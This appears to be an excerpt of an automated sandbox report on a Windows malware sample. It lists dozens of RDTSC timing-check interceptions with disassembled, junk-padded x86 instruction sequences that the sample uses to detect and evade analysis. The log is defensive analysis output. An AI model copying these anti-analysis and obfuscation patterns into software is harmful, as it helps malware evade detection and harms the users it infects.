                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190BBA second address: 5190BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190BC0 second address: 5190BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov eax, edi 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190706 second address: 519070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 519070C second address: 5190722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC73488207Bh 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190722 second address: 5190769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 36BAh 0x00000007 pushfd 0x00000008 jmp 00007FC734E5F77Bh 0x0000000d add si, 1E5Eh 0x00000012 jmp 00007FC734E5F789h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734E5F77Dh 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190769 second address: 519076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 519076F second address: 5190773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190684 second address: 51906A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 83DBh 0x00000010 mov esi, 25A782B7h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51906A7 second address: 51906B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0E91 second address: 51D0EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC734882088h 0x00000011 jmp 00007FC734882085h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC73488207Ch 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0EEB second address: 51D0F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov eax, 535C7FB9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov si, 6CF1h 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC734E5F782h 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0F1A second address: 51D0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0F20 second address: 51D0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0F26 second address: 51D0F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0F2A second address: 51D0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B031E second address: 51B0356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC73488207Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ax, 140Fh 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B0356 second address: 51B038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A446h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734E5F782h 0x00000016 or cl, FFFFFFE8h 0x00000019 jmp 00007FC734E5F77Bh 0x0000001e popfd 0x0000001f mov ch, 08h 0x00000021 popad 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B038B second address: 51B0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B0391 second address: 51B03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03A1 second address: 51B03A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03A5 second address: 51B03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03AB second address: 51B03D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734882087h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03D7 second address: 51B03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03DD second address: 51B03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B03E1 second address: 51B040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734E5F77Dh 0x00000012 jmp 00007FC734E5F77Bh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bh, cl 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0E54 second address: 51A0EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov edi, 47407D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882088h 0x00000016 sbb eax, 498865B8h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 mov esi, 0CA389EFh 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FC734882082h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FC734882087h 0x00000039 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0EC5 second address: 51A0EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC734E5F785h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F77Dh 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B00BD second address: 51B0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor eax, 186A6ABEh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 mov ax, 1807h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FC734882088h 0x00000024 sub si, 52E8h 0x00000029 jmp 00007FC73488207Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 mov cl, 91h 0x00000032 mov ecx, edx 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FC734882089h 0x00000040 sub ecx, 4FD6A7B6h 0x00000046 jmp 00007FC734882081h 0x0000004b popfd 0x0000004c jmp 00007FC734882080h 0x00000051 popad 0x00000052 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B0171 second address: 51B0195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734E5F780h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B0195 second address: 51B01A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B01A4 second address: 51B01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC734E5F783h 0x00000014 and al, 0000005Eh 0x00000017 jmp 00007FC734E5F789h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51B01F8 second address: 51B020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882083h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0611 second address: 51D0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0617 second address: 51D061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D061B second address: 51D061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D061F second address: 51D063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Eh 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D063A second address: 51D0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0649 second address: 51D0700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor ecx, 3B64683Eh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC734882080h 0x0000001b jmp 00007FC734882085h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FC73488207Eh 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov cl, B6h 0x00000031 pushfd 0x00000032 jmp 00007FC734882083h 0x00000037 add ax, 585Eh 0x0000003c jmp 00007FC734882089h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC73488207Dh 0x0000004b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0829 second address: 51D082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D082F second address: 51D0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0833 second address: 51D08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00BE4014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FC73948E864h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC734E5F789h 0x0000002c adc esi, 63E4B2F6h 0x00000032 jmp 00007FC734E5F781h 0x00000037 popfd 0x00000038 mov dl, al 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov si, 3BFBh 0x00000043 pushfd 0x00000044 jmp 00007FC734E5F780h 0x00000049 sub ax, D348h 0x0000004e jmp 00007FC734E5F77Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08A1 second address: 51D08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08A7 second address: 51D08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC73948E8CFh 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 call 00007FC734E5F77Dh 0x00000018 pushfd 0x00000019 jmp 00007FC734E5F780h 0x0000001e jmp 00007FC734E5F785h 0x00000023 popfd 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08EC second address: 51D08FA instructions: 0x00000000 rdtsc 0x00000002 mov cl, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, ax 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D08FA second address: 51D090C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 33129F49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 85h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D090C second address: 51D0937 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC73488207Ah 0x00000011 sub eax, 490CFCC8h 0x00000017 jmp 00007FC73488207Bh 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D0937 second address: 51D095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov di, 44C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F784h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51D095B second address: 51D0973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov edi, 476CC470h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 2BF98D07h 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180052 second address: 5180058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180058 second address: 5180073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, B173h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180073 second address: 51800E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC734E5F788h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC734E5F77Bh 0x0000000f popad 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC734E5F786h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub esi, 6A769D38h 0x0000002b jmp 00007FC734E5F77Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51800E6 second address: 5180114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC73488207Ah 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180114 second address: 5180139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734E5F77Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180139 second address: 51801A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734882087h 0x00000008 pushfd 0x00000009 jmp 00007FC734882088h 0x0000000e sub ecx, 666CA6B8h 0x00000014 jmp 00007FC73488207Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FC734882086h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC73488207Eh 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801A9 second address: 51801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801AF second address: 51801B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801B3 second address: 51801C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801C2 second address: 51801C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801C6 second address: 51801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51801CC second address: 5180267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC73488207Ch 0x00000013 sub ah, FFFFFFD8h 0x00000016 jmp 00007FC73488207Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC734882088h 0x00000022 and ax, B038h 0x00000027 jmp 00007FC73488207Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FC734882084h 0x00000036 add esi, 3685AA98h 0x0000003c jmp 00007FC73488207Bh 0x00000041 popfd 0x00000042 push esi 0x00000043 movsx edi, si 0x00000046 pop ecx 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC73488207Dh 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180267 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FC734E5F77Ch 0x00000010 call 00007FC734E5F782h 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F782h 0x0000001b jmp 00007FC734E5F785h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51802D0 second address: 51802D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51802D6 second address: 518030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734E5F786h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F77Eh 0x00000017 rdtsc
